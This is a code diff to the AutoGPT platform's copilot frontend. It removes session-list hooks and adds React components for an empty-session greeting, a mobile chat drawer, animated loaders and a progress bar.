--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/useCopilotShell.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/useCopilotShell.ts
@@ -1,124 +0,0 @@
-"use client";
-
-import {
-  getGetV2GetSessionQueryKey,
-  getGetV2ListSessionsQueryKey,
-  useGetV2GetSession,
-} from "@/app/api/__generated__/endpoints/chat/chat";
-import { okData } from "@/app/api/helpers";
-import { useChatStore } from "@/components/contextual/Chat/chat-store";
-import { useBreakpoint } from "@/lib/hooks/useBreakpoint";
-import { useSupabase } from "@/lib/supabase/hooks/useSupabase";
-import { useQueryClient } from "@tanstack/react-query";
-import { usePathname, useSearchParams } from "next/navigation";
-import { useCopilotStore } from "../../copilot-page-store";
-import { useCopilotSessionId } from "../../useCopilotSessionId";
-import { useMobileDrawer } from "./components/MobileDrawer/useMobileDrawer";
-import { getCurrentSessionId } from "./helpers";
-import { useShellSessionList } from "./useShellSessionList";
-
-export function useCopilotShell() {
-  const pathname = usePathname();
-  const searchParams = useSearchParams();
-  const queryClient = useQueryClient();
-  const breakpoint = useBreakpoint();
-  const { isLoggedIn } = useSupabase();
-  const isMobile =
-    breakpoint === "base" || breakpoint === "sm" || breakpoint === "md";
-
-  const { urlSessionId, setUrlSessionId } = useCopilotSessionId();
-
-  const isOnHomepage = pathname === "/copilot";
-  const paramSessionId = searchParams.get("sessionId");
-
-  const {
-    isDrawerOpen,
-    handleOpenDrawer,
-    handleCloseDrawer,
-    handleDrawerOpenChange,
-  } = useMobileDrawer();
-
-  const paginationEnabled = !isMobile || isDrawerOpen || !!paramSessionId;
-
-  const currentSessionId = getCurrentSessionId(searchParams);
-
-  const { data: currentSessionData } = useGetV2GetSession(
-    currentSessionId || "",
-    {
-      query: {
-        enabled: !!currentSessionId,
-        select: okData,
-      },
-    },
-  );
-
-  const {
-    sessions,
-    isLoading,
-    isSessionsFetching,
-    hasNextPage,
-    fetchNextPage,
-    resetPagination,
-    recentlyCreatedSessionsRef,
-  } = useShellSessionList({
-    paginationEnabled,
-    currentSessionId,
-    currentSessionData,
-    isOnHomepage,
-    paramSessionId,
-  });
-
-  const stopStream = useChatStore((s) => s.stopStream);
-  const isCreatingSession = useCopilotStore((s) => s.isCreatingSession);
-
-  function handleSessionClick(sessionId: string) {
-    if (sessionId === currentSessionId) return;
-
-    // Stop current stream - SSE reconnection allows resuming later
-    if (currentSessionId) {
-      stopStream(currentSessionId);
-    }
-
-    if (recentlyCreatedSessionsRef.current.has(sessionId)) {
-      queryClient.invalidateQueries({
-        queryKey: getGetV2GetSessionQueryKey(sessionId),
-      });
-    }
-    setUrlSessionId(sessionId, { shallow: false });
-    if (isMobile) handleCloseDrawer();
-  }
-
-  function handleNewChatClick() {
-    // Stop current stream - SSE reconnection allows resuming later
-    if (currentSessionId) {
-      stopStream(currentSessionId);
-    }
-
-    resetPagination();
-    queryClient.invalidateQueries({
-      queryKey: getGetV2ListSessionsQueryKey(),
-    });
-    setUrlSessionId(null, { shallow: false });
-    if (isMobile) handleCloseDrawer();
-  }
-
-  return {
-    isMobile,
-    isDrawerOpen,
-    isLoggedIn,
-    hasActiveSession:
-      Boolean(currentSessionId) && (!isOnHomepage || Boolean(paramSessionId)),
-    isLoading: isLoading || isCreatingSession,
-    isCreatingSession,
-    sessions,
-    currentSessionId: urlSessionId,
-    handleOpenDrawer,
-    handleCloseDrawer,
-    handleDrawerOpenChange,
-    handleNewChatClick,
-    handleSessionClick,
-    hasNextPage,
-    isFetchingNextPage: isSessionsFetching,
-    fetchNextPage,
-  };
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/useShellSessionList.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/useShellSessionList.ts
@@ -1,113 +0,0 @@
-import { getGetV2ListSessionsQueryKey } from "@/app/api/__generated__/endpoints/chat/chat";
-import type { SessionDetailResponse } from "@/app/api/__generated__/models/sessionDetailResponse";
-import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
-import { useChatStore } from "@/components/contextual/Chat/chat-store";
-import { useQueryClient } from "@tanstack/react-query";
-import { useEffect, useMemo, useRef } from "react";
-import { useSessionsPagination } from "./components/SessionsList/useSessionsPagination";
-import {
-  convertSessionDetailToSummary,
-  filterVisibleSessions,
-  mergeCurrentSessionIntoList,
-} from "./helpers";
-
-interface UseShellSessionListArgs {
-  paginationEnabled: boolean;
-  currentSessionId: string | null;
-  currentSessionData: SessionDetailResponse | null | undefined;
-  isOnHomepage: boolean;
-  paramSessionId: string | null;
-}
-
-export function useShellSessionList({
-  paginationEnabled,
-  currentSessionId,
-  currentSessionData,
-  isOnHomepage,
-  paramSessionId,
-}: UseShellSessionListArgs) {
-  const queryClient = useQueryClient();
-  const onStreamComplete = useChatStore((s) => s.onStreamComplete);
-
-  const {
-    sessions: accumulatedSessions,
-    isLoading: isSessionsLoading,
-    isFetching: isSessionsFetching,
-    hasNextPage,
-    fetchNextPage,
-    reset: resetPagination,
-  } = useSessionsPagination({
-    enabled: paginationEnabled,
-  });
-
-  const recentlyCreatedSessionsRef = useRef<
-    Map<string, SessionSummaryResponse>
-  >(new Map());
-
-  useEffect(() => {
-    if (isOnHomepage && !paramSessionId) {
-      queryClient.invalidateQueries({
-        queryKey: getGetV2ListSessionsQueryKey(),
-      });
-    }
-  }, [isOnHomepage, paramSessionId, queryClient]);
-
-  useEffect(() => {
-    if (currentSessionId && currentSessionData) {
-      const isNewSession =
-        currentSessionData.updated_at === currentSessionData.created_at;
-      const isNotInAccumulated = !accumulatedSessions.some(
-        (s) => s.id === currentSessionId,
-      );
-      if (isNewSession || isNotInAccumulated) {
-        const summary = convertSessionDetailToSummary(currentSessionData);
-        recentlyCreatedSessionsRef.current.set(currentSessionId, summary);
-      }
-    }
-  }, [currentSessionId, currentSessionData, accumulatedSessions]);
-
-  useEffect(() => {
-    for (const sessionId of recentlyCreatedSessionsRef.current.keys()) {
-      if (accumulatedSessions.some((s) => s.id === sessionId)) {
-        recentlyCreatedSessionsRef.current.delete(sessionId);
-      }
-    }
-  }, [accumulatedSessions]);
-
-  useEffect(() => {
-    const unsubscribe = onStreamComplete(() => {
-      queryClient.invalidateQueries({
-        queryKey: getGetV2ListSessionsQueryKey(),
-      });
-    });
-    return unsubscribe;
-  }, [onStreamComplete, queryClient]);
-
-  const sessions = useMemo(
-    () =>
-      mergeCurrentSessionIntoList(
-        accumulatedSessions,
-        currentSessionId,
-        currentSessionData,
-        recentlyCreatedSessionsRef.current,
-      ),
-    [accumulatedSessions, currentSessionId, currentSessionData],
-  );
-
-  const visibleSessions = useMemo(
-    () => filterVisibleSessions(sessions),
-    [sessions],
-  );
-
-  const isLoading = isSessionsLoading && accumulatedSessions.length === 0;
-
-  return {
-    sessions: visibleSessions,
-    isLoading,
-    isSessionsFetching,
-    hasNextPage,
-    fetchNextPage,
-    resetPagination,
-    recentlyCreatedSessionsRef,
-  };
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/EmptySession/EmptySession.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/EmptySession/EmptySession.tsx
@@ -0,0 +1,130 @@
+"use client";
+
+import { ChatInput } from "@/app/(platform)/copilot/components/ChatInput/ChatInput";
+import { Button } from "@/components/atoms/Button/Button";
+import { Text } from "@/components/atoms/Text/Text";
+import { useSupabase } from "@/lib/supabase/hooks/useSupabase";
+import { SpinnerGapIcon } from "@phosphor-icons/react";
+import { motion } from "framer-motion";
+import { useEffect, useState } from "react";
+import {
+  getGreetingName,
+  getInputPlaceholder,
+  getQuickActions,
+} from "./helpers";
+
+interface Props {
+  inputLayoutId: string;
+  isCreatingSession: boolean;
+  // NOTE(review): declared here but not read by the component below.
+  onCreateSession: () => void | Promise<string>;
+  onSend: (message: string) => void | Promise<void>;
+}
+
+/**
+ * Greets the user, renders the chat input, and offers quick-action prompts
+ * that are sent through `onSend`.
+ *
+ * The input placeholder is chosen from the viewport width after mount and is
+ * refreshed whenever the window is resized.
+ */
+export function EmptySession({
+  inputLayoutId,
+  isCreatingSession,
+  onSend,
+}: Props) {
+  const { user } = useSupabase();
+  const greetingName = getGreetingName(user);
+  const quickActions = getQuickActions();
+  const [loadingAction, setLoadingAction] = useState<string | null>(null);
+  const [inputPlaceholder, setInputPlaceholder] = useState(
+    getInputPlaceholder(),
+  );
+
+  useEffect(() => {
+    // Touch `window` only inside the effect: a dependency array is evaluated
+    // during render, where `window` does not exist when prerendering on the
+    // server, and it never triggers a re-render when the viewport changes.
+    function syncPlaceholder() {
+      setInputPlaceholder(getInputPlaceholder(window.innerWidth));
+    }
+
+    syncPlaceholder();
+    window.addEventListener("resize", syncPlaceholder);
+    return () => window.removeEventListener("resize", syncPlaceholder);
+  }, []);
+
+  async function handleQuickActionClick(action: string) {
+    // Ignore clicks while a session is being created or an action is in flight.
+    if (isCreatingSession || loadingAction) return;
+
+    setLoadingAction(action);
+    try {
+      await onSend(action);
+    } finally {
+      // Always clear the spinner, even when sending fails.
+      setLoadingAction(null);
+    }
+  }
+
+  return (
+    <div className="flex h-full flex-1 items-center justify-center overflow-y-auto bg-[#f8f8f9] px-0 py-5 md:px-6 md:py-10">
+      <motion.div
+        className="w-full max-w-3xl text-center"
+        initial={{ opacity: 0 }}
+        animate={{ opacity: 1 }}
+        transition={{ duration: 0.3 }}
+      >
+        <div className="mx-auto max-w-3xl">
+          <Text variant="h3" className="mb-1 !text-[1.375rem] text-zinc-700">
+            Hey, <span className="text-violet-600">{greetingName}</span>
+          </Text>
+          <Text variant="h3" className="mb-8 !font-normal">
+            Tell me about your work — I&apos;ll find what to automate.
+          </Text>
+
+          <div className="mb-6">
+            <motion.div
+              layoutId={inputLayoutId}
+              transition={{ type: "spring", bounce: 0.2, duration: 0.65 }}
+              className="w-full px-2"
+            >
+              <ChatInput
+                inputId="chat-input-empty"
+                onSend={onSend}
+                disabled={isCreatingSession}
+                placeholder={inputPlaceholder}
+                className="w-full"
+              />
+            </motion.div>
+          </div>
+        </div>
+
+        <div className="flex flex-wrap items-center justify-center gap-3 overflow-x-auto [-ms-overflow-style:none] [scrollbar-width:none] [&::-webkit-scrollbar]:hidden">
+          {quickActions.map((action) => (
+            <Button
+              key={action}
+              type="button"
+              variant="outline"
+              size="small"
+              onClick={() => void handleQuickActionClick(action)}
+              disabled={isCreatingSession || loadingAction !== null}
+              aria-busy={loadingAction === action}
+              leftIcon={
+                loadingAction === action ? (
+                  <SpinnerGapIcon
+                    className="h-4 w-4 animate-spin"
+                    weight="bold"
+                  />
+                ) : null
+              }
+              className="h-auto shrink-0 border-zinc-300 px-3 py-2 text-[.9rem] text-zinc-600"
+            >
+              {action}
+            </Button>
+          ))}
+        </div>
+      </motion.div>
+    </div>
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/EmptySession/helpers.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/EmptySession/helpers.ts
@@ -1,6 +1,26 @@
-import type { User } from "@supabase/supabase-js";
+import { User } from "@supabase/supabase-js";

-export function getGreetingName(user?: User | null): string {
+export function getInputPlaceholder(width?: number) {
+  if (!width) return "What's your role and what eats up most of your day?";
+
+  if (width < 500) {
+    return "I'm a chef and I hate...";
+  }
+  if (width <= 1080) {
+    return "What's your role and what eats up most of your day?";
+  }
+  return "What's your role and what eats up most of your day? e.g. 'I'm a recruiter and I hate...'";
+}
+
+export function getQuickActions() {
+  return [
+    "I don't know where to start, just ask me stuff",
+    "I do the same thing every week and it's killing me",
+    "Help me find where I'm wasting my time",
+  ];
+}
+
+export function getGreetingName(user?: User | null) {
  if (!user) return "there";
  const metadata = user.user_metadata as Record<string, unknown> | undefined;
  const fullName = metadata?.full_name;
@@ -16,30 +36,3 @@ export function getGreetingName(user?: User | null): string {
  }
  return "there";
 }
-
-export function buildCopilotChatUrl(prompt: string): string {
-  const trimmed = prompt.trim();
-  if (!trimmed) return "/copilot/chat";
-  const encoded = encodeURIComponent(trimmed);
-  return `/copilot/chat?prompt=${encoded}`;
-}
-
-export function getQuickActions(): string[] {
-  return [
-    "I don't know where to start, just ask me stuff",
-    "I do the same thing every week and it's killing me",
-    "Help me find where I'm wasting my time",
-  ];
-}
-
-export function getInputPlaceholder(width?: number) {
-  if (!width) return "What's your role and what eats up most of your day?";
-
-  if (width < 500) {
-    return "I'm a chef and I hate...";
-  }
-  if (width <= 1080) {
-    return "What's your role and what eats up most of your day?";
-  }
-  return "What's your role and what eats up most of your day? e.g. 'I'm a recruiter and I hate...'";
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/MobileDrawer/MobileDrawer.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/MobileDrawer/MobileDrawer.tsx
@@ -0,0 +1,140 @@
+import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
+import { Button } from "@/components/atoms/Button/Button";
+import { Text } from "@/components/atoms/Text/Text";
+import { scrollbarStyles } from "@/components/styles/scrollbars";
+import { cn } from "@/lib/utils";
+import { PlusIcon, SpinnerGapIcon, X } from "@phosphor-icons/react";
+import { Drawer } from "vaul";
+
+interface Props {
+  isOpen: boolean;
+  sessions: SessionSummaryResponse[];
+  currentSessionId: string | null;
+  isLoading: boolean;
+  onSelectSession: (sessionId: string) => void;
+  onNewChat: () => void;
+  onClose: () => void;
+  onOpenChange: (open: boolean) => void;
+}
+
+// Labels a timestamp "Today", "Yesterday", "N days ago" or e.g. "1st Jan 2026".
+function formatDate(dateString: string) {
+  const date = new Date(dateString);
+  const now = new Date();
+  // Count local calendar days, not 24h windows; Date.UTC sidesteps DST shifts.
+  const dayMs = 1000 * 60 * 60 * 24;
+  const toDay = (d: Date) =>
+    Date.UTC(d.getFullYear(), d.getMonth(), d.getDate()) / dayMs;
+  // Clamp so a slightly-future timestamp (clock skew) still reads "Today".
+  const diffDays = Math.max(0, toDay(now) - toDay(date));
+
+  if (diffDays === 0) return "Today";
+  if (diffDays === 1) return "Yesterday";
+  if (diffDays < 7) return `${diffDays} days ago`;
+
+  const day = date.getDate();
+  // 11th-13th are irregular; otherwise the last digit selects the suffix.
+  const isTeen = day >= 11 && day <= 13;
+  const ordinal = isTeen ? "th" : (["th", "st", "nd", "rd"][day % 10] ?? "th");
+  const month = date.toLocaleDateString("en-US", { month: "short" });
+  const year = date.getFullYear();
+
+  return `${day}${ordinal} ${month} ${year}`;
+}
+
+export function MobileDrawer({
+  isOpen,
+  sessions,
+  currentSessionId,
+  isLoading,
+  onSelectSession,
+  onNewChat,
+  onClose,
+  onOpenChange,
+}: Props) {
+  return (
+    <Drawer.Root open={isOpen} onOpenChange={onOpenChange} direction="left">
+      <Drawer.Portal>
+        <Drawer.Overlay className="fixed inset-0 z-[60] bg-black/10 backdrop-blur-sm" />
+        <Drawer.Content className="fixed left-0 top-0 z-[70] flex h-full w-80 flex-col border-r border-zinc-200 bg-zinc-50">
+          <div className="shrink-0 border-b border-zinc-200 px-4 py-2">
+            <div className="flex items-center justify-between">
+              <Drawer.Title className="text-lg font-semibold text-zinc-800">
+                Your chats
+              </Drawer.Title>
+              <Button
+                variant="icon"
+                size="icon"
+                aria-label="Close sessions"
+                onClick={onClose}
+              >
+                <X width="1rem" height="1rem" />
+              </Button>
+            </div>
+          </div>
+          <div
+            className={cn(
+              "flex min-h-0 flex-1 flex-col gap-1 overflow-y-auto px-3 py-3",
+              scrollbarStyles,
+            )}
+          >
+            {isLoading ? (
+              <div className="flex items-center justify-center py-4">
+                <SpinnerGapIcon className="h-5 w-5 animate-spin text-neutral-400" />
+              </div>
+            ) : sessions.length === 0 ? (
+              <p className="py-4 text-center text-sm text-neutral-500">
+                No conversations yet
+              </p>
+            ) : (
+              sessions.map((session) => (
+                <button
+                  key={session.id}
+                  onClick={() => onSelectSession(session.id)}
+                  className={cn(
+                    "w-full rounded-lg px-3 py-2.5 text-left transition-colors",
+                    session.id === currentSessionId
+                      ? "bg-zinc-100"
+                      : "hover:bg-zinc-50",
+                  )}
+                >
+                  <div className="flex min-w-0 max-w-full flex-col overflow-hidden">
+                    <div className="min-w-0 max-w-full">
+                      <Text
+                        variant="body"
+                        className={cn(
+                          "truncate font-normal",
+                          session.id === currentSessionId
+                            ? "text-zinc-600"
+                            : "text-zinc-800",
+                        )}
+                      >
+                        {session.title || "Untitled chat"}
+                      </Text>
+                    </div>
+                    <Text variant="small" className="text-neutral-400">
+                      {formatDate(session.updated_at)}
+                    </Text>
+                  </div>
+                </button>
+              ))
+            )}
+          </div>
+          {currentSessionId && (
+            <div className="shrink-0 bg-white p-3 shadow-[0_-4px_6px_-1px_rgba(0,0,0,0.05)]">
+              <Button
+                variant="primary"
+                size="small"
+                onClick={onNewChat}
+                className="w-full"
+                leftIcon={<PlusIcon width="1rem" height="1rem" />}
+              >
+                New Chat
+              </Button>
+            </div>
+          )}
+        </Drawer.Content>
+      </Drawer.Portal>
+    </Drawer.Root>
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/MobileHeader/MobileHeader.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/MobileHeader/MobileHeader.tsx
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/MorphingTextAnimation/MorphingTextAnimation.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/MorphingTextAnimation/MorphingTextAnimation.tsx
@@ -0,0 +1,54 @@
+import { cn } from "@/lib/utils";
+import { AnimatePresence, motion } from "framer-motion";
+
+interface Props {
+  text: string;
+  className?: string;
+}
+
+export function MorphingTextAnimation({ text, className }: Props) {
+  // Split by code point, not UTF-16 unit, so emoji/astral chars stay whole.
+  const letters = Array.from(text);
+  return (
+    <div className={cn(className)}>
+      <AnimatePresence mode="popLayout" initial={false}>
+        <motion.div key={text} className="whitespace-nowrap">
+          <motion.span className="inline-flex overflow-hidden">
+            {letters.map((char, index) => (
+              <motion.span
+                key={`${text}-${index}`}
+                initial={{
+                  opacity: 0,
+                  y: 8,
+                  rotateX: "80deg",
+                  filter: "blur(6px)",
+                }}
+                animate={{
+                  opacity: 1,
+                  y: 0,
+                  rotateX: "0deg",
+                  filter: "blur(0px)",
+                }}
+                exit={{
+                  opacity: 0,
+                  y: -8,
+                  rotateX: "-80deg",
+                  filter: "blur(6px)",
+                }}
+                style={{ willChange: "transform" }}
+                transition={{
+                  delay: 0.015 * index,
+                  type: "spring",
+                  bounce: 0.5,
+                }}
+                className="inline-block"
+              >
+                {char === " " ? "\u00A0" : char}
+              </motion.span>
+            ))}
+          </motion.span>
+        </motion.div>
+      </AnimatePresence>
+    </div>
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/OrbitLoader/OrbitLoader.module.css
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/OrbitLoader/OrbitLoader.module.css
@@ -0,0 +1,69 @@
+.loader {
+  position: relative;
+  animation: rotate 1s infinite;
+}
+
+.loader::before,
+.loader::after {
+  border-radius: 50%;
+  content: "";
+  display: block;
+  /* 40% of container size */
+  height: 40%;
+  width: 40%;
+}
+
+.loader::before {
+  animation: ball1 1s infinite;
+  background-color: #a1a1aa; /* zinc-400 */
+  box-shadow: calc(var(--spacing)) 0 0 #18181b; /* zinc-900 */
+  margin-bottom: calc(var(--gap));
+}
+
+.loader::after {
+  animation: ball2 1s infinite;
+  background-color: #18181b; /* zinc-900 */
+  box-shadow: calc(var(--spacing)) 0 0 #a1a1aa; /* zinc-400 */
+}
+
+@keyframes rotate {
+  0% {
+    transform: rotate(0deg) scale(0.8);
+  }
+  50% {
+    transform: rotate(360deg) scale(1.2);
+  }
+  100% {
+    transform: rotate(720deg) scale(0.8);
+  }
+}
+
+@keyframes ball1 {
+  0% {
+    box-shadow: calc(var(--spacing)) 0 0 #18181b;
+  }
+  50% {
+    box-shadow: 0 0 0 #18181b;
+    margin-bottom: 0;
+    transform: translate(calc(var(--spacing) / 2), calc(var(--spacing) / 2));
+  }
+  100% {
+    box-shadow: calc(var(--spacing)) 0 0 #18181b;
+    margin-bottom: calc(var(--gap));
+  }
+}
+
+@keyframes ball2 {
+  0% {
+    box-shadow: calc(var(--spacing)) 0 0 #a1a1aa;
+  }
+  50% {
+    box-shadow: 0 0 0 #a1a1aa;
+    margin-top: calc(var(--ball-size) * -1);
+    transform: translate(calc(var(--spacing) / 2), calc(var(--spacing) / 2));
+  }
+  100% {
+    box-shadow: calc(var(--spacing)) 0 0 #a1a1aa;
+    margin-top: 0;
+  }
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/OrbitLoader/OrbitLoader.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/OrbitLoader/OrbitLoader.tsx
@@ -0,0 +1,28 @@
+import { cn } from "@/lib/utils";
+import styles from "./OrbitLoader.module.css";
+
+interface Props {
+  size?: number;
+  className?: string;
+}
+
+export function OrbitLoader({ size = 24, className }: Props) {
+  const ballSize = Math.round(size * 0.4);
+  const spacing = Math.round(size * 0.6);
+  const gap = Math.round(size * 0.2);
+
+  return (
+    <div
+      className={cn(styles.loader, className)}
+      style={
+        {
+          width: size,
+          height: size,
+          "--ball-size": `${ballSize}px`,
+          "--spacing": `${spacing}px`,
+          "--gap": `${gap}px`,
+        } as React.CSSProperties
+      }
+    />
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/ProgressBar/ProgressBar.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/ProgressBar/ProgressBar.tsx
@@ -0,0 +1,26 @@
+import { cn } from "@/lib/utils";
+
+interface Props {
+  value: number;
+  label?: string;
+  className?: string;
+}
+
+export function ProgressBar({ value, label, className }: Props) {
+  // NaN would survive min/max and render "NaN%"; treat it as no progress.
+  const clamped = Number.isNaN(value) ? 0 : Math.min(100, Math.max(0, value));
+  return (
+    <div className={cn("flex flex-col gap-1.5", className)}>
+      <div className="flex items-center justify-between text-xs text-neutral-500">
+        <span>{label ?? "Working on it..."}</span>
+        <span>{Math.round(clamped)}%</span>
+      </div>
+      <div className="h-2 w-full overflow-hidden rounded-full bg-neutral-200">
+        <div
+          className="h-full rounded-full bg-neutral-900 transition-[width] duration-300 ease-out"
+          style={{ width: `${clamped}%` }}
+        />
+      </div>
+    </div>
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/PulseLoader/PulseLoader.module.css
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/PulseLoader/PulseLoader.module.css
@@ -0,0 +1,34 @@
+.loader {
+  position: relative;
+  display: inline-block;
+  flex-shrink: 0;
+}
+
+.loader::before,
+.loader::after {
+  content: "";
+  box-sizing: border-box;
+  width: 100%;
+  height: 100%;
+  border-radius: 50%;
+  background: currentColor;
+  position: absolute;
+  left: 0;
+  top: 0;
+  animation: ripple 2s linear infinite;
+}
+
+.loader::after {
+  animation-delay: 1s;
+}
+
+@keyframes ripple {
+  0% {
+    transform: scale(0);
+    opacity: 1;
+  }
+  100% {
+    transform: scale(1);
+    opacity: 0;
+  }
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/PulseLoader/PulseLoader.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/PulseLoader/PulseLoader.tsx
@@ -0,0 +1,16 @@
+import { cn } from "@/lib/utils";
+import styles from "./PulseLoader.module.css";
+
+interface Props {
+  size?: number;
+  className?: string;
+}
+
+export function PulseLoader({ size = 24, className }: Props) {
+  return (
+    <div
+      className={cn(styles.loader, className)}
+      style={{ width: size, height: size }}
+    />
+  );
+}
--- a/Show More
+++ b/Show More